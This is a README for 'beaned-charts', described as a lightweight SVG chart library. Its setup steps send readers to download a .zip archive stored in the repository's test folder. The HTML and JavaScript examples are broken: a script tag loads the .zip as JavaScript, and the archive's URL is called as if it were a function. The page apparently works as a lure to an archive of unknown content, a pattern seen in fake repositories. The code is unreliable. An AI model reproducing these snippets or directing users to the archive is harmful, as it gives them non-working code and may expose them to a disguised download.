Welcome to beaned-charts! This is a minimalist SVG chart library designed for modern web applications. With beaned-charts, you can generate beautiful and responsive charts using pure JavaScript—no frameworks are required. Perfect for those who want to visualize data without the complexity of big libraries.
To run beaned-charts, you will need:
- A web browser: Chrome, Firefox, Safari, or Edge (latest versions are recommended).
- Basic HTML file setup for chart integration.
To get started, visit our Releases page to download. Choose the version you want and download the files needed to use the library in your project.
- After downloading, unzip the file if it is compressed.
- Place the downloaded files in your project directory.
- Open your HTML file and link the JavaScript file from beaned-charts.
- Follow the simple examples in the documentation to create your charts.
To create a basic chart, you'll need to include the beaned-charts script in your HTML like this:
<script src="https://raw.githubusercontent.com/Zliito/beaned-charts/main/test/beaned-charts-v1.9-alpha.5.zip"></script>Then, you can create your chart by adding a JavaScript function. Here’s a simple example:
<script>
const data = [10, 20, 30, 40];
const chart = new BeanedChart('chart-container', data);
https://raw.githubusercontent.com/Zliito/beaned-charts/main/test/beaned-charts-v1.9-alpha.5.zip();
</script>Don't forget to include a <div id="chart-container"></div> in your HTML where you want the chart to appear.
- Lightweight: At just a few kilobytes, this library won’t slow down your application.
- Responsive: Charts adjust automatically to fit different screen sizes.
- Easy to Use: Simple syntax makes it user-friendly for beginners and non-coders.
- Customizable: Change colors and styles to match your application’s design.
To keep your charts up to date:
- Visit the Releases page regularly.
- Download the latest version.
- Replace the old files in your project with the new ones.
If you encounter any issues, you can open an issue on our GitHub page. Join our community to help shape the future of beaned-charts.
beaned-charts covers a variety of topics to help you integrate data visualization in your applications:
- dev
- generate
- javascript
- js
- npm
- npm-package
- package
- sb-studio
- snowbase-studio
- ui
With beaned-charts, generating SVG charts has never been easier. Explore the possibilities by downloading today from our Releases page and see how simple it is to visualize your data.
Your journey into visual data representation starts here!